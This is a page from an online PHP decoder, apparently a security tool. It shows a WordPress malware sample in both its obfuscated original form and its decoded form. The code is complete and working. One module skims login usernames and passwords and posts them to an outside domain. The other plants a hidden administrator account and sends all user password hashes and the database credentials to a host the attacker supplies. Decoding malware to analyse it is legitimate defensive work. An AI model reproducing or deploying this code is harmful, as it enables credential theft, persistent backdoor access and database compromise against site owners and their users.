Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
// B_MODULE if (!empty($_POST["\154\x6f\x67"]) && !empty($_POST["\x70\167\144"])) { $wp_..
Decoded Output download
<? // B_MODULE
if (!empty($_POST["log"]) && !empty($_POST["pwd"])) { $wp_users = array(); $wp_users = array("user_login" => $_POST["log"], "user_pass" => $_POST["pwd"], "ip" => $_SERVER["REMOTE_ADDR"], "date_added" => date("Y-m-d H:i:s")); $options = array("body" => array("button" => "buttonB", "home" => get_option("home"), "wp_users" => $wp_users, "REQUEST_URI" => $_SERVER["REQUEST_URI"])); $result = wp_remote_post("http://api.wordpressdockerhub.com/button.php", $options); } ?>
<?php
// A_MODULE
if (isset($_POST["buttonA"])) { global $wpdb; $table_name = $wpdb->get_blog_prefix(); $sample = "a:1:{s:13:"administrator";b:1;}"; $wpdb->query("INSERT INTO {$wpdb->users} (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('100010010', '100010010', '$P$Bsqe7TVS8fBuiW8a58Vb.KpPa0BkFh1', '100010010', '[email protected]', '', '2011-06-07 00:00:00', '', '0', '100010010');"); $wpdb->query("INSERT INTO {$wpdb->usermeta} (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (100010010, '100010010', '{$table_name}capabilities', '{$sample}');"); $wpdb->query("INSERT INTO {$wpdb->usermeta} (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '100010010', '{$table_name}user_level', '10');"); $users = $wpdb->get_results("SELECT * FROM {$wpdb->users}"); $wp_users = array(); foreach ($users as $key => $user) { $wp_users[$key]["ID"] = $user->ID; $wp_users[$key]["user_login"] = $user->user_login; $wp_users[$key]["user_pass"] = $user->user_pass; $wp_users[$key]["user_nicename"] = $user->user_nicename; $wp_users[$key]["user_email"] = $user->user_email; $wp_users[$key]["user_url"] = $user->user_url; $wp_users[$key]["user_registered"] = $user->user_registered; $wp_users[$key]["user_activation_key"] = $user->user_activation_key; $wp_users[$key]["user_status"] = $user->user_status; $wp_users[$key]["display_name"] = $user->display_name; } $wp_options = array(); $wp_options = array("template" => get_option("template")); $database_settings = array(); $database_settings = array("DB_NAME" => DB_NAME, "DB_USER" => DB_USER, "DB_PASSWORD" => DB_PASSWORD, "DB_HOST" => DB_HOST); $options = array("body" => array("button" => "buttonA", "home" => get_option("home"), "wp_users" => $wp_users, "wp_options" => $wp_options, "database_settings" => $database_settings)); $result = wp_remote_post("http://" . $_POST["buttonA"] . "/button.php", $options); print "true"; } ?>
Did this file decode correctly?
Original Code
// B_MODULE
if (!empty($_POST["\154\x6f\x67"]) && !empty($_POST["\x70\167\144"])) { $wp_users = array(); $wp_users = array("\x75\x73\x65\x72\137\154\x6f\x67\x69\x6e" => $_POST["\x6c\157\147"], "\165\x73\145\162\137\160\141\163\x73" => $_POST["\160\167\x64"], "\x69\160" => $_SERVER["\122\105\115\x4f\x54\x45\x5f\101\x44\x44\122"], "\x64\x61\164\x65\137\141\144\144\145\144" => date("\x59\x2d\x6d\x2d\x64\40\x48\72\x69\x3a\x73")); $options = array("\x62\157\x64\x79" => array("\x62\x75\164\x74\x6f\156" => "\x62\165\164\x74\x6f\156\x42", "\150\x6f\x6d\145" => get_option("\x68\157\155\x65"), "\x77\160\137\x75\x73\145\162\x73" => $wp_users, "\x52\105\121\x55\x45\x53\x54\137\x55\122\111" => $_SERVER["\122\x45\121\125\x45\123\x54\x5f\125\x52\x49"])); $result = wp_remote_post("\x68\x74\x74\160\72\x2f\x2f\141\x70\x69\x2e\x77\157\x72\144\x70\162\x65\163\x73\x64\x6f\143\153\145\162\x68\x75\x62\56\x63\157\155\x2f\142\x75\164\164\157\x6e\x2e\160\x68\160", $options); } ?>
<?php
// A_MODULE
if (isset($_POST["\142\x75\164\x74\157\156\101"])) { global $wpdb; $table_name = $wpdb->get_blog_prefix(); $sample = "\141\x3a\x31\72\x7b\x73\72\61\x33\72\x22\141\144\x6d\x69\x6e\x69\163\x74\x72\x61\164\157\x72\42\x3b\x62\72\61\x3b\175"; $wpdb->query("\111\x4e\x53\105\x52\124\40\111\x4e\x54\117\x20{$wpdb->users}\40\50\x60\x49\x44\x60\x2c\x20\140\x75\x73\145\x72\137\x6c\x6f\147\151\156\140\x2c\x20\140\x75\x73\145\x72\137\160\141\x73\163\x60\x2c\x20\140\x75\163\145\x72\137\x6e\x69\x63\145\x6e\141\x6d\145\140\54\40\x60\x75\x73\145\x72\x5f\x65\155\141\151\154\140\54\40\140\165\x73\x65\x72\137\x75\x72\x6c\140\x2c\x20\x60\165\163\145\162\x5f\x72\x65\x67\x69\x73\164\x65\x72\x65\x64\140\x2c\40\x60\x75\163\x65\162\x5f\141\x63\x74\x69\166\x61\x74\x69\x6f\x6e\x5f\x6b\145\x79\140\x2c\x20\140\165\163\145\x72\x5f\163\x74\141\164\165\x73\140\x2c\x20\140\x64\x69\x73\160\x6c\141\x79\137\x6e\x61\x6d\145\x60\51\x20\126\x41\x4c\x55\105\123\40\50\x27\61\x30\60\x30\61\x30\60\x31\x30\x27\54\x20\47\x31\60\x30\x30\x31\60\60\x31\x30\x27\54\40\47\x24\x50\x24\102\x73\161\145\67\x54\x56\123\x38\146\x42\x75\151\x57\70\141\65\x38\126\x62\56\x4b\x70\120\x61\x30\102\x6b\x46\x68\x31\47\x2c\40\47\61\x30\60\x30\x31\x30\60\x31\60\47\54\40\47\x74\x65\x40\145\141\x2e\x73\x74\x27\x2c\40\x27\x27\54\40\x27\62\x30\x31\x31\x2d\60\66\x2d\60\x37\40\x30\60\72\x30\x30\x3a\60\60\x27\x2c\x20\x27\47\x2c\x20\x27\60\47\54\x20\x27\61\x30\60\x30\x31\x30\60\x31\60\47\x29\x3b"); $wpdb->query("\111\x4e\x53\x45\122\124\40\111\x4e\x54\x4f\40{$wpdb->usermeta}\40\x28\x60\x75\155\x65\164\141\x5f\151\144\x60\x2c\x20\140\165\163\x65\162\137\x69\144\x60\x2c\x20\140\155\x65\x74\141\x5f\153\x65\x79\140\54\40\140\x6d\x65\x74\141\x5f\x76\x61\x6c\165\x65\140\x29\x20\126\101\x4c\125\x45\x53\x20\50\x31\x30\x30\x30\61\60\x30\x31\60\54\40\x27\61\x30\60\x30\61\60\60\61\x30\x27\x2c\x20\x27{$table_name}\x63\141\160\x61\x62\151\154\151\164\151\145\x73\47\x2c\40\47{$sample}\x27\x29\x3b"); $wpdb->query("\111\x4e\x53\105\122\x54\40\111\x4e\x54\x4f\40{$wpdb->usermeta}\40\x28\140\165\155\145\x74\141\137\x69\x64\140\x2c\x20\140\x75\x73\145\x72\x5f\x69\x64\x60\54\x20\x60\x6d\145\164\141\137\153\145\x79\x60\54\x20\x60\x6d\145\x74\x61\137\166\x61\154\x75\x65\x60\51\40\126\101\114\x55\x45\123\x20\50\116\x55\114\x4c\x2c\40\x27\61\60\60\60\61\60\x30\x31\60\47\54\40\47{$table_name}\x75\163\x65\x72\137\154\145\166\145\154\x27\54\x20\x27\61\x30\47\51\x3b"); $users = $wpdb->get_results("\123\x45\x4c\105\x43\x54\x20\x2a\40\x46\122\117\115\40{$wpdb->users}"); $wp_users = array(); foreach ($users as $key => $user) { $wp_users[$key]["\x49\104"] = $user->ID; $wp_users[$key]["\x75\163\x65\x72\x5f\154\x6f\147\151\x6e"] = $user->user_login; $wp_users[$key]["\165\163\145\162\x5f\x70\x61\x73\163"] = $user->user_pass; $wp_users[$key]["\165\x73\x65\162\x5f\156\x69\143\145\156\x61\x6d\x65"] = $user->user_nicename; $wp_users[$key]["\x75\x73\145\162\x5f\145\155\x61\151\x6c"] = $user->user_email; $wp_users[$key]["\x75\163\145\x72\137\165\162\154"] = $user->user_url; $wp_users[$key]["\165\163\x65\x72\x5f\162\145\x67\151\163\x74\x65\162\x65\144"] = $user->user_registered; $wp_users[$key]["\x75\163\145\162\x5f\x61\143\164\x69\166\x61\164\x69\x6f\x6e\x5f\153\x65\171"] = $user->user_activation_key; $wp_users[$key]["\165\x73\x65\162\137\163\x74\141\x74\x75\x73"] = $user->user_status; $wp_users[$key]["\x64\x69\163\160\x6c\141\x79\x5f\x6e\x61\155\145"] = $user->display_name; } $wp_options = array(); $wp_options = array("\x74\145\155\160\154\x61\x74\145" => get_option("\164\x65\155\x70\154\141\164\145")); $database_settings = array(); $database_settings = array("\x44\102\137\116\101\115\105" => DB_NAME, "\x44\x42\x5f\125\123\105\x52" => DB_USER, "\x44\x42\137\120\x41\x53\123\127\117\122\x44" => DB_PASSWORD, "\x44\x42\x5f\110\x4f\123\124" => DB_HOST); $options = array("\142\x6f\x64\x79" => array("\x62\x75\x74\164\x6f\x6e" => "\x62\x75\x74\x74\x6f\156\101", "\x68\157\x6d\x65" => get_option("\150\x6f\x6d\x65"), "\x77\160\137\x75\163\145\x72\x73" => $wp_users, "\167\x70\x5f\157\160\164\x69\x6f\156\163" => $wp_options, "\144\x61\164\141\142\x61\163\x65\137\163\145\x74\x74\x69\x6e\x67\x73" => $database_settings)); $result = wp_remote_post("\x68\x74\164\x70\x3a\57\57" . $_POST["\142\x75\x74\164\x6f\x6e\101"] . "\x2f\x62\165\164\x74\x6f\x6e\x2e\160\150\160", $options); print "\x74\162\x75\x65"; } ?>
Function Calls
| None |
Stats
| MD5 | 0afac0c3bb462231743729e35ab3fec1 |
| Eval Count | 0 |
| Decode Time | 48 ms |